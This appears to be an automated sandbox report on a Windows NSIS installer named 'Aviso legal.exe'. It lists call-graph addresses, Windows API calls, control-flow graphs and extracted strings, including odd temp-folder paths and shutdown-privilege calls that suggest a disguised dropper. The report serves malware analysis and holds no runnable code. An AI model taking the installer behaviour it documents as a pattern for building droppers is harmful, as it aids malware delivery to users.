40430a lstrlenW 4869 40657a 17 API calls 4868->4869 4870 404320 SetWindowTextW 4869->4870 4871 401389 2 API calls 4870->4871 4871->4851 4872->4830 4873 40437e CreateDialogParamW 4872->4873 4873->4830 4874 4043b1 4873->4874 4875 404499 18 API calls 4874->4875 4876 4043bc GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4875->4876 4877 401389 2 API calls 4876->4877 4878 404402 4877->4878 4878->4828 4879 40440a ShowWindow 4878->4879 4880 4044e5 SendMessageW 4879->4880 4880->4830 4882 40657a 17 API calls 4881->4882 4883 4044a4 SetDlgItemTextW 4882->4883 4883->4857 4884->4861 4885->4866 4886->4868 4888 404479 4887->4888 4889 40447f SendMessageW 4887->4889 4888->4889 4889->4850 4891 4045c3 4890->4891 4892 404518 GetWindowLongW 4890->4892 4891->4828 4892->4891 4893 40452d 4892->4893 4893->4891 4894 40455a GetSysColor 4893->4894 4895 40455d 4893->4895 4894->4895 4896 404563 SetTextColor 4895->4896 4897 40456d SetBkMode 4895->4897 4896->4897 4898 404585 GetSysColor 4897->4898 4899 40458b 4897->4899 4898->4899 4900 404592 SetBkColor 4899->4900 4901 40459c 4899->4901 4900->4901 4901->4891 4902 4045b6 CreateBrushIndirect 4901->4902 4903 4045af DeleteObject 4901->4903 4902->4891 4903->4902 5580 705b1000 5583 705b101b 5580->5583 5584 705b15b6 GlobalFree 5583->5584 5585 705b1020 5584->5585 5586 705b1027 GlobalAlloc 5585->5586 5587 705b1024 5585->5587 5586->5587 5588 705b15dd 3 API calls 5587->5588 5589 705b1019 5588->5589 5590 401b9b 5591 401bec 5590->5591 5597 401ba8 5590->5597 5592 401c16 GlobalAlloc 5591->5592 5595 401bf1 5591->5595 5596 40657a 17 API calls 5592->5596 5593 401c31 5594 40657a 17 API calls 5593->5594 5603 40239d 5593->5603 5598 402397 5594->5598 5595->5603 5611 40653d lstrcpynW 5595->5611 5596->5593 5597->5593 5600 401bbf 5597->5600 5598->5603 5604 405b9d MessageBoxIndirectW 5598->5604 5609 40653d lstrcpynW 5600->5609 5601 401c03 GlobalFree 5601->5603 5604->5603 5605 401bce 5610 40653d lstrcpynW 5605->5610 5607 401bdd 5612 40653d lstrcpynW 5607->5612 5609->5605 5610->5607 5611->5601 5612->5603 5613 40261c 5614 402da6 17 API calls 5613->5614 5615 402623 5614->5615 5618 40602d GetFileAttributesW CreateFileW 5615->5618 5617 40262f 5618->5617 5619 40149e 5620 4014ac PostQuitMessage 5619->5620 5621 40239d 5619->5621 5620->5621 5622 40259e 5623 402de6 17 API calls 5622->5623 5624 4025a8 5623->5624 5625 402d84 17 API calls 5624->5625 5626 4025b1 5625->5626 5627 4025d9 RegEnumValueW 5626->5627 5628 4025cd RegEnumKeyW 5626->5628 5630 40292e 5626->5630 5629 4025ee RegCloseKey 5627->5629 5628->5629 5629->5630 4153 4015a3 4154 402da6 17 API calls 4153->4154 4155 4015aa SetFileAttributesW 4154->4155 4156 4015bc 4155->4156 4160 401fa4 4161 402da6 17 API calls 4160->4161 4162 401faa 4161->4162 4163 40559f 24 API calls 4162->4163 4164 401fb4 4163->4164 4173 405b20 CreateProcessW 4164->4173 4169 40292e 4170 401fcf 4171 401fdd FindCloseChangeNotification 4170->4171 4181 406484 wsprintfW 4170->4181 4171->4169 4174 405b53 CloseHandle 4173->4174 4175 401fba 4173->4175 4174->4175 4175->4169 4175->4171 4176 4069b5 WaitForSingleObject 4175->4176 4177 4069cf 4176->4177 4178 4069e1 GetExitCodeProcess 4177->4178 4182 406946 4177->4182 4178->4170 4181->4171 4183 406963 PeekMessageW 4182->4183 4184 406973 WaitForSingleObject 4183->4184 4185 406959 DispatchMessageW 4183->4185 4184->4177 4185->4183 5632 705b103d 5633 705b101b 5 API calls 5632->5633 5634 705b1056 5633->5634 5635 40202a 5636 402da6 17 API calls 5635->5636 5637 402031 5636->5637 5638 40690a 5 API calls 5637->5638 5639 402040 5638->5639 5640 40205c GlobalAlloc 5639->5640 5642 4020cc 5639->5642 5641 402070 5640->5641 5640->5642 5643 40690a 5 API calls 5641->5643 5644 402077 5643->5644 5645 40690a 5 API calls 5644->5645 5646 402081 5645->5646 5646->5642 5650 406484 wsprintfW 5646->5650 5648 4020ba 5651 406484 wsprintfW 5648->5651 5650->5648 5651->5642 5652 40252a 5653 402de6 17 API calls 5652->5653 5654 402534 5653->5654 5655 402da6 17 API calls 5654->5655 5656 40253d 5655->5656 5657 402548 RegQueryValueExW 5656->5657 5662 40292e 5656->5662 5658 40256e RegCloseKey 5657->5658 5659 402568 5657->5659 5658->5662 5659->5658 5663 406484 wsprintfW 5659->5663 5663->5658 5664 4021aa 5665 402da6 17 API calls 5664->5665 5666 4021b1 5665->5666 5667 402da6 17 API calls 5666->5667 5668 4021bb 5667->5668 5669 402da6 17 API calls 5668->5669 5670 4021c5 5669->5670 5671 402da6 17 API calls 5670->5671 5672 4021cf 5671->5672 5673 402da6 17 API calls 5672->5673 5674 4021d9 5673->5674 5675 402218 CoCreateInstance 5674->5675 5676 402da6 17 API calls 5674->5676 5679 402237 5675->5679 5676->5675 5677 401423 24 API calls 5678 4022f6 5677->5678 5679->5677 5679->5678 5680 403baa 5681 403bb5 5680->5681 5682 403bb9 5681->5682 5683 403bbc GlobalAlloc 5681->5683 5683->5682 4262 40352d SetErrorMode GetVersionExW 4263 4035b7 4262->4263 4264 40357f GetVersionExW 4262->4264 4265 403610 4263->4265 4266 40690a 5 API calls 4263->4266 4264->4263 4267 40689a 3 API calls 4265->4267 4266->4265 4268 403626 lstrlenA 4267->4268 4268->4265 4269 403636 4268->4269 4270 40690a 5 API calls 4269->4270 4271 40363d 4270->4271 4272 40690a 5 API calls 4271->4272 4273 403644 4272->4273 4274 40690a 5 API calls 4273->4274 4275 403650 #17 OleInitialize SHGetFileInfoW 4274->4275 4353 40653d lstrcpynW 4275->4353 4278 40369d GetCommandLineW 4354 40653d lstrcpynW 4278->4354 4280 4036af 4281 405e39 CharNextW 4280->4281 4282 4036d5 CharNextW 4281->4282 4292 4036e6 4282->4292 4283 4037e4 4284 4037f8 GetTempPathW 4283->4284 4355 4034fc 4284->4355 4286 403810 4287 403814 GetWindowsDirectoryW lstrcatW 4286->4287 4288 40386a DeleteFileW 4286->4288 4290 4034fc 12 API calls 4287->4290 4365 40307d GetTickCount GetModuleFileNameW 4288->4365 4289 405e39 CharNextW 4289->4292 4293 403830 4290->4293 4292->4283 4292->4289 4296 4037e6 4292->4296 4293->4288 4295 403834 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4293->4295 4294 40387d 4302 405e39 CharNextW 4294->4302 4326 403941 4294->4326 4338 403932 4294->4338 4298 4034fc 12 API calls 4295->4298 4449 40653d lstrcpynW 4296->4449 4301 403862 4298->4301 4301->4288 4301->4326 4316 40389f 4302->4316 4304 403a69 4461 405b9d 4304->4461 4305 403a7e 4307 403a86 GetCurrentProcess OpenProcessToken 4305->4307 4308 403afc ExitProcess 4305->4308 4313 403acc 4307->4313 4314 403a9d LookupPrivilegeValueW AdjustTokenPrivileges 4307->4314 4310 403908 4317 405f14 18 API calls 4310->4317 4311 403949 4315 405b08 5 API calls 4311->4315 4318 40690a 5 API calls 4313->4318 4314->4313 4319 40394e lstrcatW 4315->4319 4316->4310 4316->4311 4320 403914 4317->4320 4321 403ad3 4318->4321 4322 40396a lstrcatW lstrcmpiW 4319->4322 4323 40395f lstrcatW 4319->4323 4320->4326 4450 40653d lstrcpynW 4320->4450 4324 403ae8 ExitWindowsEx 4321->4324 4325 403af5 4321->4325 4322->4326 4327 40398a 4322->4327 4323->4322 4324->4308 4324->4325 4465 40140b 4325->4465 4454 403b12 4326->4454 4330 403996 4327->4330 4331 40398f 4327->4331 4334 405aeb 2 API calls 4330->4334 4333 405a6e 4 API calls 4331->4333 4332 403927 4451 40653d lstrcpynW 4332->4451 4336 403994 4333->4336 4337 40399b SetCurrentDirectoryW 4334->4337 4336->4337 4339 4039b8 4337->4339 4340 4039ad 4337->4340 4393 403bec 4338->4393 4453 40653d lstrcpynW 4339->4453 4452 40653d lstrcpynW 4340->4452 4343 40657a 17 API calls 4344 4039fa DeleteFileW 4343->4344 4345 403a06 CopyFileW 4344->4345 4350 4039c5 4344->4350 4345->4350 4346 403a50 4348 4062fd 36 API calls 4346->4348 4347 4062fd 36 API calls 4347->4350 4348->4326 4349 40657a 17 API calls 4349->4350 4350->4343 4350->4346 4350->4347 4350->4349 4351 405b20 2 API calls 4350->4351 4352 403a3a CloseHandle 4350->4352 4351->4350 4352->4350 4353->4278 4354->4280 4356 4067c4 5 API calls 4355->4356 4358 403508 4356->4358 4357 403512 4357->4286 4358->4357 4359 405e0c 3 API calls 4358->4359 4360 40351a 4359->4360 4361 405aeb 2 API calls 4360->4361 4362 403520 4361->4362 4468 40605c 4362->4468 4472 40602d GetFileAttributesW CreateFileW 4365->4472 4367 4030bd 4386 4030cd 4367->4386 4473 40653d lstrcpynW 4367->4473 4369 4030e3 4370 405e58 2 API calls 4369->4370 4371 4030e9 4370->4371 4474 40653d lstrcpynW 4371->4474 4373 4030f4 GetFileSize 4378 40310b 4373->4378 4390 4031ee 4373->4390 4375 4031f7 4377 403227 GlobalAlloc 4375->4377 4375->4386 4487 4034e5 SetFilePointer 4375->4487 4376 4034cf ReadFile 4376->4378 4486 4034e5 SetFilePointer 4377->4486 4378->4376 4381 40325a 4378->4381 4378->4386 4389 403019 6 API calls 4378->4389 4378->4390 4383 403019 6 API calls 4381->4383 4382 403242 4385 4032b4 31 API calls 4382->4385 4383->4386 4384 403210 4387 4034cf ReadFile 4384->4387 4391 40324e 4385->4391 4386->4294 4388 40321b 4387->4388 4388->4377 4388->4386 4389->4378 4475 403019 4390->4475 4391->4386 4392 40328b SetFilePointer 4391->4392 4392->4386 4394 40690a 5 API calls 4393->4394 4395 403c00 4394->4395 4396 403c06 4395->4396 4397 403c18 4395->4397 4503 406484 wsprintfW 4396->4503 4398 40640b 3 API calls 4397->4398 4399 403c48 4398->4399 4401 403c67 lstrcatW 4399->4401 4403 40640b 3 API calls 4399->4403 4402 403c16 4401->4402 4488 403ec2 4402->4488 4403->4401 4406 405f14 18 API calls 4407 403c99 4406->4407 4408 403d2d 4407->4408 4410 40640b 3 API calls 4407->4410 4409 405f14 18 API calls 4408->4409 4411 403d33 4409->4411 4412 403ccb 4410->4412 4413 403d43 LoadImageW 4411->4413 4414 40657a 17 API calls 4411->4414 4412->4408 4417 403cec lstrlenW 4412->4417 4421 405e39 CharNextW 4412->4421 4415 403de9 4413->4415 4416 403d6a RegisterClassW 4413->4416 4414->4413 4420 40140b 2 API calls 4415->4420 4418 403da0 SystemParametersInfoW CreateWindowExW 4416->4418 4419 403df3 4416->4419 4422 403d20 4417->4422 4423 403cfa lstrcmpiW 4417->4423 4418->4415 4419->4326 4424 403def 4420->4424 4426 403ce9 4421->4426 4425 405e0c 3 API calls 4422->4425 4423->4422 4427 403d0a GetFileAttributesW 4423->4427 4424->4419 4428 403ec2 18 API calls 4424->4428 4429 403d26 4425->4429 4426->4417 4430 403d16 4427->4430 4431 403e00 4428->4431 4504 40653d lstrcpynW 4429->4504 4430->4422 4433 405e58 2 API calls 4430->4433 4434 403e0c ShowWindow 4431->4434 4435 403e8f 4431->4435 4433->4422 4437 40689a 3 API calls 4434->4437 4496 405672 OleInitialize 4435->4496 4439 403e24 4437->4439 4438 403e95 4440 403eb1 4438->4440 4442 403e99 4438->4442 4441 403e32 GetClassInfoW 4439->4441 4444 40689a 3 API calls 4439->4444 4443 40140b 2 API calls 4440->4443 4445 403e46 GetClassInfoW RegisterClassW 4441->4445 4446 403e5c DialogBoxParamW 4441->4446 4442->4419 4447 40140b 2 API calls 4442->4447 4443->4419 4444->4441 4445->4446 4448 40140b 2 API calls 4446->4448 4447->4419 4448->4419 4449->4284 4450->4332 4451->4338 4452->4339 4453->4350 4455 403b2a 4454->4455 4456 403b1c CloseHandle 4454->4456 4516 403b57 4455->4516 4456->4455 4459 405c49 67 API calls 4460 403a5e OleUninitialize 4459->4460 4460->4304 4460->4305 4462 405bb2 4461->4462 4463 403a76 ExitProcess 4462->4463 4464 405bc6 MessageBoxIndirectW 4462->4464 4464->4463 4466 401389 2 API calls 4465->4466 4467 401420 4466->4467 4467->4308 4469 406069 GetTickCount GetTempFileNameW 4468->4469 4470 40609f 4469->4470 4471 40352b 4469->4471 4470->4469 4470->4471 4471->4286 4472->4367 4473->4369 4474->4373 4476 403022 4475->4476 4477 40303a 4475->4477 4480 403032 4476->4480 4481 40302b DestroyWindow 4476->4481 4478 403042 4477->4478 4479 40304a GetTickCount 4477->4479 4482 406946 2 API calls 4478->4482 4483 403058 CreateDialogParamW ShowWindow 4479->4483 4484 40307b 4479->4484 4480->4375 4481->4480 4485 403048 4482->4485 4483->4484 4484->4375 4485->4375 4486->4382 4487->4384 4489 403ed6 4488->4489 4505 406484 wsprintfW 4489->4505 4491 403f47 4506 403f7b 4491->4506 4493 403c77 4493->4406 4494 403f4c 4494->4493 4495 40657a 17 API calls 4494->4495 4495->4494 4509 4044e5 4496->4509 4498 4044e5 SendMessageW 4500 4056ce OleUninitialize 4498->4500 4499 405695 4501 4056bc 4499->4501 4512 401389 4499->4512 4500->4438 4501->4498 4503->4402 4504->4408 4505->4491 4507 40657a 17 API calls 4506->4507 4508 403f89 SetWindowTextW 4507->4508 4508->4494 4510 4044fd 4509->4510 4511 4044ee SendMessageW 4509->4511 4510->4499 4511->4510 4514 401390 4512->4514 4513 4013fe 4513->4499 4514->4513 4515 4013cb MulDiv SendMessageW 4514->4515 4515->4514 4517 403b65 4516->4517 4518 403b2f 4517->4518 4519 403b6a FreeLibrary GlobalFree 4517->4519 4518->4459 4519->4518 4519->4519 5684 401a30 5685 402da6 17 API calls 5684->5685 5686 401a39 ExpandEnvironmentStringsW 5685->5686 5687 401a4d 5686->5687 5689 401a60 5686->5689 5688 401a52 lstrcmpW 5687->5688 5687->5689 5688->5689 4570 4023b2 4571 4023ba 4570->4571 4573 4023c0 4570->4573 4572 402da6 17 API calls 4571->4572 4572->4573 4574 402da6 17 API calls 4573->4574 4575 4023ce 4573->4575 4574->4575 4576 4023dc 4575->4576 4578 402da6 17 API calls 4575->4578 4577 402da6 17 API calls 4576->4577 4579 4023e5 WritePrivateProfileStringW 4577->4579 4578->4576 4580 402434 4581 402467 4580->4581 4582 40243c 4580->4582 4584 402da6 17 API calls 4581->4584 4592 402de6 4582->4592 4586 40246e 4584->4586 4597 402e64 4586->4597 4587 40244d 4589 402da6 17 API calls 4587->4589 4591 402454 RegDeleteValueW RegCloseKey 4589->4591 4590 40247b 4591->4590 4593 402da6 17 API calls 4592->4593 4594 402dfd 4593->4594 4595 4063aa RegOpenKeyExW 4594->4595 4596 402443 4595->4596 4596->4587 4596->4590 4598 402e71 4597->4598 4599 402e78 4597->4599 4598->4590 4599->4598 4601 402ea9 4599->4601 4602 4063aa RegOpenKeyExW 4601->4602 4603 402ed7 4602->4603 4604 402ee1 4603->4604 4605 402f8c 4603->4605 4606 402ee7 RegEnumValueW 4604->4606 4607 402f0a 4604->4607 4605->4598 4606->4607 4608 402f71 RegCloseKey 4606->4608 4607->4608 4609 402f46 RegEnumKeyW 4607->4609 4610 402f4f RegCloseKey 4607->4610 4612 402ea9 6 API calls 4607->4612 4608->4605 4609->4607 4609->4610 4611 40690a 5 API calls 4610->4611 4613 402f5f 4611->4613 4612->4607 4614 402f81 4613->4614 4615 402f63 RegDeleteKeyW 4613->4615 4614->4605 4615->4605 5695 401735 5696 402da6 17 API calls 5695->5696 5697 40173c SearchPathW 5696->5697 5698 401757 5697->5698 5699 4014b8 5700 4014be 5699->5700 5701 401389 2 API calls 5700->5701 5702 4014c6 5701->5702 5703 401d38 5704 402d84 17 API calls 5703->5704 5705 401d3f 5704->5705 5706 402d84 17 API calls 5705->5706 5707 401d4b GetDlgItem 5706->5707 5708 402638 5707->5708 4982 40263e 4983 402652 4982->4983 4984 40266d 4982->4984 4985 402d84 17 API calls 4983->4985 4986 402672 4984->4986 4987 40269d 4984->4987 4993 402659 4985->4993 4988 402da6 17 API calls 4986->4988 4989 402da6 17 API calls 4987->4989 4990 402679 4988->4990 4991 4026a4 lstrlenW 4989->4991 5001 40655f WideCharToMultiByte 4990->5001 4991->4993 4995 4026e7 4993->4995 4996 4026d9 4993->4996 4997 4026ca 4993->4997 4994 40268d lstrlenA 4994->4993 4998 4060df WriteFile 4996->4998 4999 40610e 5 API calls 4997->4999 4998->4995 5000 4026d1 4999->5000 5000->4995 5000->4996 5001->4994

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 0 40352d-40357d SetErrorMode GetVersionExW 1 4035b7-4035be 0->1 2 40357f-4035b3 GetVersionExW 0->2 3 4035c0 1->3 4 4035c8-403608 1->4 2->1 3->4 5 40360a-403612 call 40690a 4->5 6 40361b 4->6 5->6 12 403614 5->12 8 403620-403634 call 40689a lstrlenA 6->8 13 403636-403652 call 40690a * 3 8->13 12->6 20 403663-4036c5 #17 OleInitialize SHGetFileInfoW call 40653d GetCommandLineW call 40653d 13->20 21 403654-40365a 13->21 28 4036c7-4036c9 20->28 29 4036ce-4036e1 call 405e39 CharNextW 20->29 21->20 25 40365c 21->25 25->20 28->29 32 4037d8-4037de 29->32 33 4037e4 32->33 34 4036e6-4036ec 32->34 37 4037f8-403812 GetTempPathW call 4034fc 33->37 35 4036f5-4036fb 34->35 36 4036ee-4036f3 34->36 38 403702-403706 35->38 39 4036fd-403701 35->39 36->35 36->36 44 403814-403832 GetWindowsDirectoryW lstrcatW call 4034fc 37->44 45 40386a-403882 DeleteFileW call 40307d 37->45 42 4037c6-4037d4 call 405e39 38->42 43 40370c-403712 38->43 39->38 42->32 61 4037d6-4037d7 42->61 47 403714-40371b 43->47 48 40372c-403765 43->48 44->45 64 403834-403864 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034fc 44->64 66 403888-40388e 45->66 67 403a59-403a67 call 403b12 OleUninitialize 45->67 52 403722 47->52 53 40371d-403720 47->53 54 403781-4037bb 48->54 55 403767-40376c 48->55 52->48 53->48 53->52 58 4037c3-4037c5 54->58 59 4037bd-4037c1 54->59 55->54 56 40376e-403776 55->56 62 403778-40377b 56->62 63 40377d 56->63 58->42 59->58 65 4037e6-4037f3 call 40653d 59->65 61->32 62->54 62->63 63->54 64->45 64->67 65->37 70 403894-4038a7 call 405e39 66->70 71 403935-40393c call 403bec 66->71 77 403a69-403a78 call 405b9d ExitProcess 67->77 78 403a7e-403a84 67->78 84 4038f9-403906 70->84 85 4038a9-4038de 70->85 80 403941-403944 71->80 82 403a86-403a9b GetCurrentProcess OpenProcessToken 78->82 83 403afc-403b04 78->83 80->67 91 403acc-403ada call 40690a 82->91 92 403a9d-403ac6 LookupPrivilegeValueW AdjustTokenPrivileges 82->92 86 403b06 83->86 87 403b09-403b0c ExitProcess 83->87 88 403908-403916 call 405f14 84->88 89 403949-40395d call 405b08 lstrcatW 84->89 93 4038e0-4038e4 85->93 86->87 88->67 105 40391c-403932 call 40653d * 2 88->105 103 40396a-403984 lstrcatW lstrcmpiW 89->103 104 40395f-403965 lstrcatW 89->104 106 403ae8-403af3 ExitWindowsEx 91->106 107 403adc-403ae6 91->107 92->91 95 4038e6-4038eb 93->95 96 4038ed-4038f5 93->96 95->96 100 4038f7 95->100 96->93 96->100 100->84 109 403a57 103->109 110 40398a-40398d 103->110 104->103 105->71 106->83 108 403af5-403af7 call 40140b 106->108 107->106 107->108 108->83 109->67 113 403996 call 405aeb 110->113 114 40398f-403994 call 405a6e 110->114 121 40399b-4039ab SetCurrentDirectoryW 113->121 114->121 123 4039b8-4039e4 call 40653d 121->123 124 4039ad-4039b3 call 40653d 121->124 128 4039e9-403a04 call 40657a DeleteFileW 123->128 124->123 131 403a44-403a4e 128->131 132 403a06-403a16 CopyFileW 128->132 131->128 134 403a50-403a52 call 4062fd 131->134 132->131 133 403a18-403a38 call 4062fd call 40657a call 405b20 132->133 133->131 142 403a3a-403a41 CloseHandle 133->142 134->109 142->131
                                APIs
                                • SetErrorMode.KERNELBASE(00008001), ref: 00403550
                                • GetVersionExW.KERNEL32(?), ref: 00403579
                                • GetVersionExW.KERNEL32(0000011C), ref: 00403590
                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403627
                                • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403663
                                • OleInitialize.OLE32(00000000), ref: 0040366A
                                • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 00403688
                                • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 0040369D
                                • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Aviso legal.exe",00000020,"C:\Users\user\Desktop\Aviso legal.exe",00000000), ref: 004036D6
                                • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 00403809
                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040381A
                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403826
                                • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040383A
                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403842
                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403853
                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040385B
                                • DeleteFileW.KERNELBASE(1033), ref: 0040386F
                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403956
                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403965
                                  • Part of subcall function 00405AEB: CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403970
                                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Aviso legal.exe",00000000,?), ref: 0040397C
                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040399C
                                • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00436000,?), ref: 004039FB
                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\Aviso legal.exe,0042AA28,00000001), ref: 00403A0E
                                • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403A3B
                                • OleUninitialize.OLE32(?), ref: 00403A5E
                                • ExitProcess.KERNEL32 ref: 00403A78
                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A8C
                                • OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA7
                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AC6
                                • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AEB
                                • ExitProcess.KERNEL32 ref: 00403B0C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                • String ID: "C:\Users\user\Desktop\Aviso legal.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\geokemi$C:\Users\user\AppData\Local\Temp\geokemi\Threshers135\Polls\Overdid$C:\Users\user\Desktop$C:\Users\user\Desktop\Aviso legal.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                • API String ID: 3859024572-1444467751
                                • Opcode ID: ea0cae1bb7d5915cd49b585c952b984ac3b7c511afb70fb70d540011af4007ef
                                • Instruction ID: 4d4dc0a58e4858e72561def8a0259f0227da8af974c10a5ea2b310ef4b80d7a5
                                • Opcode Fuzzy Hash: ea0cae1bb7d5915cd49b585c952b984ac3b7c511afb70fb70d540011af4007ef
                                • Instruction Fuzzy Hash: 66E10670A00214AADB10AFB59D45BAF3AB8EF4470AF14847FF545B22D1DB7C8A41CB6D

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 143 4056de-4056f9 144 405888-40588f 143->144 145 4056ff-4057c6 GetDlgItem * 3 call 4044ce call 404e27 GetClientRect GetSystemMetrics SendMessageW * 2 143->145 146 405891-4058b3 GetDlgItem CreateThread FindCloseChangeNotification 144->146 147 4058b9-4058c6 144->147 163 4057e4-4057e7 145->163 164 4057c8-4057e2 SendMessageW * 2 145->164 146->147 150 4058e4-4058ee 147->150 151 4058c8-4058ce 147->151 155 4058f0-4058f6 150->155 156 405944-405948 150->156 153 4058d0-4058df ShowWindow * 2 call 4044ce 151->153 154 405909-405912 call 404500 151->154 153->150 167 405917-40591b 154->167 160 4058f8-405904 call 404472 155->160 161 40591e-40592e ShowWindow 155->161 156->154 158 40594a-405950 156->158 158->154 165 405952-405965 SendMessageW 158->165 160->154 168 405930-405939 call 40559f 161->168 169 40593e-40593f call 404472 161->169 171 4057f7-40580e call 404499 163->171 172 4057e9-4057f5 SendMessageW 163->172 164->163 173 405a67-405a69 165->173 174 40596b-405996 CreatePopupMenu call 40657a AppendMenuW 165->174 168->169 169->156 182 405810-405824 ShowWindow 171->182 183 405844-405865 GetDlgItem SendMessageW 171->183 172->171 173->167 180 405998-4059a8 GetWindowRect 174->180 181 4059ab-4059c0 TrackPopupMenu 174->181 180->181 181->173 184 4059c6-4059dd 181->184 185 405833 182->185 186 405826-405831 ShowWindow 182->186 183->173 187 40586b-405883 SendMessageW * 2 183->187 188 4059e2-4059fd SendMessageW 184->188 189 405839-40583f call 4044ce 185->189 186->189 187->173 188->188 190 4059ff-405a22 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 188->190 189->183 192 405a24-405a4b SendMessageW 190->192 192->192 193 405a4d-405a61 GlobalUnlock SetClipboardData CloseClipboard 192->193 193->173
                                APIs
                                • GetDlgItem.USER32(?,00000403), ref: 0040573C
                                • GetDlgItem.USER32(?,000003EE), ref: 0040574B
                                • GetClientRect.USER32(?,?), ref: 00405788
                                • GetSystemMetrics.USER32(00000002), ref: 0040578F
                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B0
                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C1
                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D4
                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E2
                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057F5
                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405817
                                • ShowWindow.USER32(?,00000008), ref: 0040582B
                                • GetDlgItem.USER32(?,000003EC), ref: 0040584C
                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040585C
                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405875
                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405881
                                • GetDlgItem.USER32(?,000003F8), ref: 0040575A
